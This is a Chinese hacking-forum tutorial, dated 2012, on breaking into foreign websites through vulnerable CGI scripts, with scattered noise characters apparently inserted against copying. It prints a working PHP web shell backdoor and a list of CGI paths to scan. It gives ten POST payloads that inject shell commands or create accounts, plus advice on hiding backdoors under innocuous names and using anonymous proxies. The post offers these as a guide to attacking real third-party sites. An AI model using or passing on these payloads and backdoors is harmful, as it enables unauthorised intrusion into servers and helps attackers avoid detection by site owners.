中国网络渗透测试联盟

标题: CGI 脚本入侵快速上手+脚本使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:54
标题: CGI 脚本入侵快速上手+脚本使用方法
CGI 脚本入侵快速上手+脚本使用方法2 r/ `# `0 a, }7 H
大家好 我是bboyhip  只是一名菜菜的exploiter
+ {" |3 Z8 R$ G! K6 ^( q! W$ g9 w% P很开心来到贵论坛8 U+ ?9 v6 k6 v
这里让我感觉 很有技术交流的感觉! z- Q7 u0 i5 [+ x+ s8 v
我会长长来玩的
0 j) u; E9 K$ K: n" [! f4 i6 c# p; \前言:) I) x& A* a2 c1 R
以下讲解针对欧美日本网站
  F5 P7 Z& r% y/ |. T5 X當我們在做滲透分析的時候 方法有很多
: F! Y5 |, o% K: s! X6 G我门都知道 国外伺服器大多是linux 平台, e# b, ~7 F0 a$ C
所以有很多网站程序有6成都会使用cgi 脚本来管理( p8 L+ {4 ?2 Y4 X+ a1 e8 ~
目录为/cgi-bin/
" `3 b0 F' r: ?- c! {
! |' F: F5 U  [3 r) I只是个人在实务上一些经验( U5 r# t! n& {/ [2 m* R: i
写的不好 请多多见谅喔
+ s5 B. s7 i" k# r; {  s4 h在这里我简单分为几个部份一定要會的
7 l4 P- p- F& C/ c6 N讲解一下
: W+ H& ~6 K  Z  g( F让没有基础的人很容易上手3 n/ X6 o4 c5 L4 N
3 A. k2 X# L9 e$ j3 x6 |3 X& ~1 N
以下内容跟帖回复才能看到
( o. K5 D$ B( p6 G* ]# G, J==============================1 _: f8 L4 ^$ |2 Z

+ ]: ^- ~3 T0 Q- f9 a第1部份: 何谓Shell?
+ c2 V# u& z$ v& d2 S1 IShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:' @  n4 t' S1 ]
A shell is the program which reads user input from the command line and executes actions based upon that input.% H$ t+ X* b& q3 w" E$ E
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
1 o, V; Y- v" z
, Y: n/ P8 b0 d  L对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  7 a( d4 i4 ]) v
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除." V+ b, N( J+ @2 a3 q
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.0 P% i* b0 V$ x' |2 s$ V2 j

$ }- M( ^) V: A3 @+ Z) Y% D. F& r$ \第2部份: Unix 指令
5 b4 R9 k0 J- S& K7 u以下是一些常见及重要的指令:
- r0 ]/ `5 L/ ~# c3 b- Qpwd: 显示当前目录, 即是後门/程式所在的位置% c% P0 V9 e0 y
如 /home/www/site.com/cgi-bin/
) N) l4 S0 k$ |* [3 r1 |5 Fls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
  ^$ D' N5 |) K/ _  q5 fls -al :详细列出档案资料(当前目录)
# }2 Q* w6 \- {4 [+ c( Q5 z! G& @ls /: 列出根目录
% _4 E' e. }; }; J9 I% w" fls /etc: 列出/etc的资料夹及档案4 k8 {  q: z( X1 b# |+ u
ls ../ -al: 详细列出上一层的资料夹及档案
! @$ [% V. z, e( a* j$ h- o" \cat: 显示档案内容3 b* z2 I8 U1 h, m1 A' ?
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
, e4 [" o# F( T8 \) Kcat /etc/passwd: 显示 /etc/passwd 这个档案的内容/ c- Y. v+ O1 U' z( K3 y' g% g. r3 P
who: 显示谁login 至系统
1 L7 F5 q7 V& e! aman: 显示指令用法  
' j+ u) |+ Z6 Q0 h0 g4 D1 R. u& {man ls: 显示ls这指令的用法  7 ^7 _( x2 o" Q* W
mkdir 建立目录* r+ Z0 d) Z$ M; O
rmdir 删除目录
, F' _, E- |0 }1 `' q. kmv 移动档案
6 k* t8 Y. R# L- c  vrm 删除档案- P) ~7 w; @+ T: x) Z

3 ]1 z" C6 o$ j$ K$ Q9 ]第3部份: Shell的使用. X( [' p% a4 Y) d
例如:$ f  W5 j: u/ i" t" H9 h# S
http://site.com/refer.php
( i* V6 \1 ?1 v( E0 P+ b& x这是我的後门, 原代码如下:+ Z4 n5 A# G* d/ {
<Form Action="#" Method="POST">
5 A% R1 ~2 q% M  M4 L- w<Input type="text" name="cmd">
6 t1 E1 v  J. ?+ }3 B<Input type="Submit"> ! h* S( J5 z+ U9 |( O( x: Y; P  s
</Form> * G2 k& q. o' `: @1 J  U
<?php 4 d5 c6 G- r' W# S) x
$cmd = $_POST['cmd'];
+ h& {1 J! _9 g, t, z/ V* Q$Output = shell_exec($cmd);   d# t) Z: o7 N# e4 r4 R
echo $Output;
( Z* _+ N5 Q- J, e$ ?( C6 x?>
0 t2 \0 P5 x% X" w7 Z输入pwd, 可得到绝对路径:# h+ g7 D9 n  k
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com) g, m$ _% L. `& E

9 [9 |' w. K5 C& S7 x$ _8 ~; Y第4部份: 注意事项
. T  B6 A8 D6 {$ I8 }- 使用匿名代理, 保障自己
+ T+ W8 W  |1 ?0 ~6 Q6 [) Q% r- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
. ]2 S- V' U1 t3 L- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.7 e4 `! t6 D- ^. M0 K- g( R
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
3 N- V) v& u8 ^) G! g5 k- D0 ~- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,) y; E& l" @( i. f8 b5 g
不容易被发现.5 q$ S9 X  D4 c" J  u
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
* ?7 Z. `2 j3 X8 H+ ~: p6 \% N针对网站的渗透分析方法太多了
/ X  K% H0 M0 z) J/ g5 G$ ~( ~7 ~9 I/ p这篇文章的重点是cgi 脚本攻击7 b$ Q  Q: G! M5 k0 h7 z
所以我用简单的叙述形容
) a: x2 \5 _; Z8 m9 L% a" D开始讲解脚本入侵过程:
, D. M( P4 R0 E在这里提供一些方法思路让大家学习一下) e6 O+ b6 |( p

1 G; B; I/ L. A. O4 D1.一开始对一个网站进行cgi漏洞扫描
( |% _2 [* w) _- v6 t. r7 m我们需要的东西有1 L* A0 D% Q) _9 s
扫洞工具 如:triton..等等
1 X+ F2 t7 {& A7 p* W6 `E表5 S+ N/ I; h  {& y/ ~& P+ s6 ]  g
' v3 Z/ n. ?" C; T5 S& T2 f
/cgi-bin/add-passwd.cgi
+ F$ |2 {7 @$ g9 Z8 W% H6 }# S/WebShop/templates/cc.txt
9 J3 ^- l1 s/ N  e' f( V/Admin_files/order.log" s. a9 ~+ \0 _6 A" Q9 \* S  Z
/orders/mountain.cfg
2 o  X+ c1 I/ M3 R! n/cgi-sys/cart.pl$ C' w( U- w, P( J4 y
/scripts/cart.pl! f8 C0 W5 _- q. p- v
/htbin/cart.pl
$ d$ n8 D" l9 a3 h' }2 DE表来源可以是网路收寻或是自己的0 day: r* R* U) N( @
6 |3 ]1 e! _6 @0 J" b  F% E
2.怎样确认扫到的洞 是真的还假的?
* j4 f3 c9 x) [( q! O% u% S举例: target: http://www.site.com/cgi-bin/add-passwd.cgi5 {5 g( `- v! p+ q9 D
一般都是在IE里先看一下的,记住这个返回码哦
) {: o4 ?) R' _9 c' o+ oERROR:This script should be referenced with a METHOD of POST.4 [* U; e. I$ G1 P0 y2 `4 y
没有返回一定是假的
/ w. P- m0 ~' t) c3.重来来了 很多人都会问我
" ]+ L& q' d0 P0 C他扫到很多洞 但是不会使用
) f9 m  [6 K7 S% q& K因为这些漏洞 使用的语法 称为post
/ C/ }; o8 g1 B5 r7 C我们要找post 的方法很多
) K% E4 t) u$ U3 C0 }& F: o可以是源代码分析 找出介质
4 h, T* U1 m4 o* X/ R9 M或是用抓包工具 抓他的语法...等等
- o# }, W  |3 o
! q9 V6 A' K( v( I, B+ l9 `5 G以下我提供10个 cgi 洞以及使用方法post
4 F# D- f0 q# o0 B让大家可以针对网站去做扫描  
  ^) Z5 K8 V) U/index.cgi/ J4 V0 `* S& H7 i" |, v. S
wei=ren&gen=command
* e$ G/ {) L$ O+ F/passmaster.cgi; p1 ~; L1 R. _
Action=Add&Username=Username&Password=Password
0 P- o8 t/ d' ]  U9 [% ?7 V/accountcreate.cgi" g' ^: l; R# g/ ?
username=username&password=password&ref1=|echo;ls|
$ q4 V2 l6 d( Q/form.cgi
5 b, A/ ]- N9 J2 ~) T0 Lname=xxxx&email=email&subject=xxxx&response=|echo;ls|
! ~3 A; `2 h/ [4 B0 K, ^/addusr.pl
" d- d! N8 W+ _3 N  u9 n/cgi-bin/EuroDebit/addusr.pl3 B* d- G' a/ w
user=username&pass=Password&confirm=Password
3 o4 i' @, |9 |( X; o/ccbill-local.asp0 x4 M1 T4 @; f& M, o
post_values=username:password  O7 ]" B9 n. k2 q
/count.cgi
. n9 N4 L. Z# @  i7 gpinfile=|echo;ls -la;exit| 3 q1 }! [0 f' f; v  `- i; B6 v
/recon.cgi
+ N. R* J0 k- n. o. A7 y3 w/recon.cgi?search
; w) n3 i+ a4 P8 I1 wsearchoption=1&searchfor=|echo;ls -al;exit|
) M8 Q, J0 R% k9 g/verotelrum.pl
( Q5 E4 }( g7 V1 K# z# _vercode=username:password:dseegsow:add:amount<&30>8 B: q) l/ o/ s+ s% f, j; O! q
/af.cgi_browser_out=|echo;ls -la;exit;|
+ b: J# i% P/ p4 t( n
8 x0 y& @! N6 M8 I$ Q今天就讲到这  感谢大家支持; X2 m& P' L1 }  P$ }; @/ J" Z0 `





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2